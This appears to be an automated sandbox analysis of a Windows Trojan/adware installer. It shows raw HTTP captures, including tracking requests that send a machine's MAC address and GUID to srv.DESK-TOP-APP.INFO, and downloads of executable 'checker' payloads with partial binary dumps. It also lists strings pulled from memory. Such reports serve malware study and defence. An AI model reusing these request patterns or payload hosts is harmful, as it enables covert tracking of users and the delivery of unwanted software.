Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Sun, 20 Dec 2015 02:41:07 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......
<<< skipped >>>
GET /offers/images/Theme12/bodyImg.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 20 Dec 2015 02:41:07 GMT
Content-Type: image/png
Content-Length: 1914
Connection: keep-alive
Cache-Control: max-age=604800
Last-Modified: Mon, 05 Aug 2013 10:27:32 GMT
ETag: "36dd864c691ce1:0"
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
Expires: Sun, 27 Dec 2015 02:41:07 GMT
X-Cache: HIT
Accept-Ranges: bytes
.PNG........IHDR.......:.....j.......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...0PLTE................................................{.......IDATx......:..`..p..J.4.ty.:......)v..\....,.fwv..U...!.....b.f.....Cy(..OW......w......]R..l..2My}<..]..8hn{*..X.).m..4w.U.J.....u..l.J...<...>uJ.....i.>o.%......I.\..S......U.D.}OK..J`......sJ`.}..M.9%..A....u.T.%........K....OQ..._..d.>..L....]I. U.].c.Je...|.W.U?..E.}...*.vZ...K...M....).W...^V..>).e(.].Z.}dg%@....S.*/...........Y.W.]}...|.SgO........rrj...4UY../..r.~.....Z.ep.wui.sP^..X.g%$(.......C........Ze....4yn}....U.({.V..{o..}O...w.G.Q.^..r..p....0y............8......6.v....zz~....-...F*..f.F]...R..*. -......e{mO.s.i.9.U....zz.6.f.T>.f.DQ%.. ...l.q\N."eA({_W7..Q.....d........>...Y.."e.\....s,.. .Li)%....R.o.....C.9wQ....8........KNY..t..)...k...v)P*.....I...4&../.{)..qe..R.'...2..*..d.z&.T;y..)Q*....)R..2..)Tj.B..)V..b..)W......QB!rj.B.J)..N)b*...R)q..<S...z%.LPr..%.LQ2.4e.....q&*c.De,..J.x& ig...g..b.(.g..p.)Qf..uf*1g..af .Y...... .;(.....s......r.v. ...s'...K.0wS.....sG%.......-.R..}......4S.....W.....=.9eN(..OS..Jt(...<...P.(..DJ;_)..Y. ..7.>.@.Bi....HS)eM.qi;...........$.z%.[..P...SJzT*E]......2zT.t..L%6.TJ..Y.a...}.V..J...,.....H... ....;..2_._/[.^/[.\.W.\.!..%oT*y.Z....#Q.Bw.FI.7...H..2Jt.*..../........2.F..X.....gqJ.q:.U.q.. V...B..s.(.J2.x..()#1@.'d4.Hh.h.J.I.i.G.#.;.J....*Q$Z..?.........sR..D.<...| ......2.1b.A3...v.....X.y{..R....{h..pzJ.I.).Y..Kn.z;%Jn..c.W...bL........t..!...A..(..*
<<< skipped >>>
GET /offers/images/Theme12/bottomLine.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Sun, 20 Dec 2015 02:41:07 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......
<<< skipped >>>
GET /offers/images/Theme12/button_over.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 20 Dec 2015 02:41:07 GMT
Content-Type: image/png
Content-Length: 921
Connection: keep-alive
Cache-Control: max-age=604800
Last-Modified: Mon, 05 Aug 2013 17:21:05 GMT
ETag: "f072da2a092ce1:0"
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
Expires: Sun, 27 Dec 2015 02:41:07 GMT
X-Cache: HIT
Accept-Ranges: bytes
.PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e<...;IDATx..Z;o.1..Y.D...W."$=D..*=BPR@..5..........DHi...M.i...e.r............;..N.h..=.|..x6..f..pf...n...yX...>z......`87.3...t.e:.sh..e..z.A....G.p..IZ.z...?Ra8........Y......O.......[........sL..?@.o....y..-.....Lc.0......O..|z.O/...k.....e...n..!......G.p...9....3. .'?7 ..GD@..{.<....C$....N.........Q...<.,@...].;Q.'<.(.X.r.,.6.......QrB..h..d&r....6....G..Shr.... .....4r..= ..f.....B.qP..l.K........YB.Z....H....../:.l.(.S.D...nM7..P.%R........&_uR.H6A..(raP.H9...[\D. .(....d...`.8.A......r5Q..........:v.e....u.....-&.1.....&.........Z.|....).L...$....)K%a-....b..a*{<(W..P<..w7_Z.....h.%6.N........*\FB...A...#..f.N...C..(.p...........K.|..5d..3u-........(.k. 7..6..tsvP!.U0.q.......9z.e ..0.ALt..@l..2iR.2............. .>=...{WVim....f.c6.:...|.....0X.yk...../z..!.SHW.d......o.s........a..8..g.|zvg...o6......@..........n.^......IEND.B`.....
GET /offers/images/Theme12/button.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 20 Dec 2015 02:41:08 GMT
Content-Type: image/png
Content-Length: 458
Connection: keep-alive
Cache-Control: max-age=604800
Last-Modified: Mon, 05 Aug 2013 17:21:12 GMT
ETag: "1b5642f092ce1:0"
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
Expires: Sun, 27 Dec 2015 02:41:08 GMT
X-Cache: HIT
Accept-Ranges: bytes
.PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e<...lIDATx...1..p....at.`...[_)...&.........~...C..V$z.J.w.Wi........../..<........R.H)s..i....t.....}2M...9i.&..(..c.....l.&.0`.&a..f...p...R.Jr....bA....$.....cr....u....sq..x....?..> ..pu`.h..C.......$w$..gY. .....%9MS...V.....IF'..0].;..HF..]b..Hr..pW...k..{..EQD.....-L.....#..H.u.. ..lF....j".,<........<. ......18....\.....oI...^.....:..._......rU.<Z`..d..E.|.0.......B.....IEND.B`.HTTP/1.1 200 OK..Date: Sun, 20 Dec 2015 02:41:08 GMT..Content-Type: image/png..Content-Length: 458..Connection: keep-alive..Cache-Control: max-age=604800..Last-Modified: Mon, 05 Aug 2013 17:21:12 GMT..ETag: "1b5642f092ce1:0"..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..Expires: Sun, 27 Dec 2015 02:41:08 GMT..X-Cache: HIT..Accept-Ranges: bytes...PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e<...lIDATx...1..p....at.`...[_)...&.........~...C..V$z.J.w.Wi........../..<........R.H)s..i....t.....}2M...9i.&..(..c.....l.&.0`.&a..f...p...R.Jr....bA....$.....cr....u....sq..x....?..> ..pu`.h..C.......$w$..gY. .....%9MS...V.....IF'..0].;..HF..]b..Hr..pW...k..{..EQD.....-L.....#..H.u.. ..lF....j".,<........<. ......18....\.....oI...^.....:..._......rU.<Z`..d..E.|.0.......B.....IEND.B`...
<<< skipped >>>
GET /dc.js HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: stats.g.doubleclick.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=10886400
Date: Sun, 20 Dec 2015 01:16:03 GMT
Expires: Sun, 20 Dec 2015 03:16:03 GMT
Last-Modified: Thu, 05 Nov 2015 22:24:16 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 15977
Cache-Control: public, max-age=7200
Age: 5104
...........}kW....w~........pk..f......Z.R..Y.C 8i.pi......b..}.>g..Kl...}4....d....O...-.....`~...E...]7..>..>....Pf.a.yU."HCC...i...T*..b.....'..Olf[.Y.[c6P/.....'n.m'..m.... !_XXll..&..(..E..V=/.u.X..%.w...i..rDoT.....?>z..1`.D...y...y7. \...5ZI...TA..........C...p3..A..x.k.q4.2...?L.k=.v....4.:sB[...l.w.o {.....?Nc....|..........q.........[.n..2..X~.......S.f.]h~....7:.n...m.C#6...........#....y...7.|..f.W.>..wS......)..Q....i......z......D.`...7N....y.C;....`1....x..p.tG.L..=..1r...M..2..)xa...{0!..5...^...7..."..........J8... ...5.O....l...r...|....R...P.0ok.8.Z.2....i|...S.y.od...~..k.>.....0vGr.mI.....0.&&yg.sf2......m.....G=0..B.6..u....A.h.A.0.V.:.-...j..L.....5.E.[...Q.{2imA......T........~. ...0*%.....>......hX...ga1./$......f.#..d,.|www5/XX...c5..D-.....p.h..8D.@./.X,.....&gTV..5..,.x..?.....(.>?6Sy.].`.]...'-"....-...........(.n.@_"p"`.*...T.1.$..t.....o?.."../.kX.)L.....-.....E1M.....@..T.F9.,HP........# ....d...-,.......-.j..BS....9...%.~Sug,...`."...4a..@.p]..yn.i(5.....U.r..$j..0{|.i.5........H}.......A=..&.Vq....4<..*7c.<b.....OQ8X...&..a/a.....aI.j.7.E.:cuV=.P.q..d.....X....#..@.T...q......U.T~.@.C......S.#....Q.....K......A.y._....z|..9...9.zM......%m........m).?4.Q...c.....PTDB&..7.-G....E.....E.7.t.V..G....._..!.....xt..}.......Ev..x..a.{...d.. .q./..OB|..6..{....a^.......@?.......o.....*T.;/Oa.......J..........I.)......J..#..A....FS.....t.H..h...W..|B.~..t.6..........t"<..z..||.......8..B9......x.a....m.V[.=...K!..\.....w."d...=>.B..(K...u.....~.".@b
<<< skipped >>>
GET /Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=382014019&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 20 Dec 2015 02:41:06 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 8
Connection: keep-alive
..OK..HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Sun, 20 Dec 2015 02:41:06 GMT..Server: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc-Version: 4.0..X-Powered-By: ASP.NET..Content-Length: 8..Connection: keep-alive....OK....
GET /Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&version=6.12 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 20 Dec 2015 02:41:04 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 17120
Connection: keep-alive
..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"8,$.Fmkcsez_oajgRvjdo"8.(.% O_fGew.2.AIBS^?UPM=IM]RMDN Qj^op_o_[XAkd_j.nsv.x FF=TXARLQANRZMN>P.Mnbtu\j`UZJ[hh.PpTW:kfanEnqoYgeco.qbr '.M^eH_x24 5.CDCVYBQRP@FOXSP?Q.SmalrZpbV[=mgbg.ity.{.HI@QZ<SOLDJT]PK@K.Piepw_m]WUK^ck*RsWT<fgdiHjsr\dg^p.len"*.J`imonM]mc.2.:kfan>rmrk`k ).Onobp[oBB.4154.3$.:jt[xoOda]m.8-&!EsU\ao?moCmot_gd.3/).DteSMD.3 ensl:-*Yhbel\hj.a_fhZgi(qq/?habhBfmsni`)]s^ ).DteSMD-.8.bspp8*'\fgdiaen,^\if_ff-nu-<ed`mAcrprg]&`qc.&!?okhYi]Jfhd.: ..<fgdiCesrma]'cu_.)-qdd`gr.',nfp8/32/43.)-s\Wm_p:=G=NL@DZ066 65 (e\dc*^dbasgl8*.*'o]rri]mXlbq^qrj8`omn7).iebdYghed_q*rs*Ykb-p[uaPmnl]Zah9skkci5hBA>mNLJ0ok!`sf^< _]BMD=$pcf9$]ZKD@$lpq9$]ZGQK$o_e9764)22$`bh`=00*3.a^cc925/.ornb7`iiej..% L`earSMD.3 ensl:-*kmo,P?QREP?9O:QOP-_ok*'j_dblr DwiYhbaL`earQ^j`^l<iebepd\8/12 onobp[obb:,8006!\dlrf^</01.0!ec^^o9270.0.alomprwd\8 4/ rus`dl8,0#]nkkg`hmhbr]sjak`5Pib^ndo&baZ8)$e\<1&gnYb`;. uarqdgi64 1"evo]mg_i7/., MYo^ 7'0("?_\dmglh`hD_oY.3 .&!=nrdndksp_rNeeF]tl 7.ZY"*.H\rmrn!6-/'.@_db]sevc.2(**.JqkmmoajgP^nd.: ,$.=gp]qap_i[tK_q_!6-/'.Necbj@btcmAilr^fk.:.'.Qbpqo`hOda]m<mjg`jdJdf`.8kokh, >YiKsk;r?hc^c]hv.4snuc'.MnlFh@cgp`knbtbCmot_gd`k 7.0., MmiBlO_fql_mAilr^fkar 5.,.*.JqaEv`J`lsinSark.2.) ).OneCs]M^qrfsRajp].3 -. .Pmnl@qcO_rqlrO]mf 7./., KgnmCu_QassglQZjr_!6"..$.ImpnQagI`q. 7.GGEWZ;PKPBHS[UQ@J.Lmcnv]rcWT<fgdi.lvz.t.AIBS^?UPM=IM]RMDN Qj^op_o_[XM_dd)K
<<< skipped >>>
GET /Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=382014019&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&status=2&installedid=10700&z=1&offerscreenid=234&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 20 Dec 2015 02:41:07 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 8
Connection: keep-alive
..OK..HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Sun, 20 Dec 2015 02:41:07 GMT..Server: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc-Version: 4.0..X-Powered-By: ASP.NET..Content-Length: 8..Connection: keep-alive....OK......
GET /Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&version=6.12&nipids=-29408-28693-28657-29219-29736&secondcall=1&reqid=382014019 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 20 Dec 2015 02:41:06 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 18274
Connection: keep-alive
..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"83$.Fmkcsez_oajgRvjdo"8.(( .*,3)25(*0.*.LdcKct.5. ).QagI`q1- 7.!("P`hjkrK[la"8.9QH ).Onobp[oBB.40("?go\rqL`ear 5('.GpQ`etDjjDgqq[kh"8,$.>vbOQH"8..'.Cu_TNL0.2..*.=nim_i\Gblb.9."*.Ga_coOQH"8.`omn7).ort)K@KTBLC=T?NJQ'alg. oda]ml-Asm]mg^Ga_coMbneci7j_dblh`=2.)!igam<.92 0( 6332)261-2&06,05&bdkobb:-//36!d`Zbm715540.^hsknquib8*1 $psr^ir8 -.alijeenmg_naqh`ie;Ph_Zrbm%`f`8(!a`:/%es_b_8*$s_qoimi51'// dttcmf\e;-. .R_o].3 .&!=dbdldhl^fC]t_.2. 71*7)2611.&05043-04*,2 ).@jtgqamnqbmQagI`qn.8.. .P_tgpm 7'0("Ca^`\rfpd.: ,$.IplgnpimiJ\mc.4,-, ?an\pbj`jcwMYo^ 7'0("Qg]`i?cndnIlnl\ej.4/("Tdjon_iIebep>ghf_k^Kenc.2..*.=`jRsi9n<fb]j^ov.2oksb&!NulDf<`eo_roit`Ailr^fkar 5..% OomEnP`_pe_oCmot_gd`k 7.!("Nm]@qcO_rqlrO]mf 7.!("Nm]@qcO_rqlrQYgnc.4!., KgnmCu_QassglO^pj.9."*.HjlrBrdNeqpdoO_iod.: .$.ImpnQagI`q. 7.!("NjkoKcdEdu62.2..{)u!Loqo=s^ 7.!("Nm]@qc.4!., >ghimk_mpTwk].3/).LkngoauZrfimPyn`k.3 -. .RcbC`r 7.GGEWZ;PKPBHS[UQ@J.Lmcnv]rcWT<fgdi.lvz.t.AIBS^?UPM=IM]RMDN Qj^op_o_[XM_dd)KsYV@iiejAilr^fkar.m^m.*.LdcKct./.8.BJAY]>MMKCKN^QSCM.Nhdqq`neZW9hbel.or|.w.CDCVYBQRP@FOXSP?Q.SmalrZpbV[Iagg&MnZY;legmDfnm_ifdn paj.% O_okrrIYh^ 7.@iiej:mhup_q., Kjj]s`nH@"8-1/)6).@hw_tkJ_dbl!60*.AnP_fnEkrGikoZji.9-, @p`NPI.9.hroh5(-^ghco`df)\bkg`el,mm*:kfan@iqojd[,brd., @p`NPI,!6"folk3-,[legm]ai'aahl]ij)jp(?jcfkDgnlmb` _wa"*.;jfk^hcHil`.5...;legm?anmpf
<<< skipped >>>
GET /Installer/XP/XPLimitChecker.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d2vubraihqcany.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 50053
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:33 GMT
Last-Modified: Mon, 04 May 2015 10:45:00 GMT
ETag: "b6631cd12092841cac0763c854828c50"
Accept-Ranges: bytes
Server: AmazonS3
Age: 58623
X-Cache: Hit from cloudfront
Via: 1.1 cbb439ecf760e902d3e0e61532befa44.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6ToIHSzlvCevjx-oE-X31SHNGakUJ2nznCSaQFx-0754AyVLT2u9zw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^....... ...0.......p....@..........................0...............................................t..........(C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X............v..............@....ndata....... ...........................rsrc...(C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.E..H.P.u..u..u...Hr@..B...SV.5p.E..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>
GET /Installer/OperaBrowser/OperaChecker25-6.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.download4desktop.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 20 Dec 2015 02:41:05 GMT
Content-Type: application/octet-stream
Content-Length: 50225
Connection: keep-alive
x-amz-id-2: CoAEnAYr vtTssgqA80wgkeF0t8KiUctOp019VhfUpMyTBpnOjgf2Bj9tqGzQjfzCG6rKyk8Pyo=
x-amz-request-id: 653592A504321CA5
Last-Modified: Wed, 25 Jun 2014 14:41:23 GMT
ETag: "10ffabc748d68c40b68f883058c9b932"
Server: NetDNA-cache/2.2
Content-Disposition: attachment
X-Cache: HIT
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t..........PC...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...PC.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1772:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
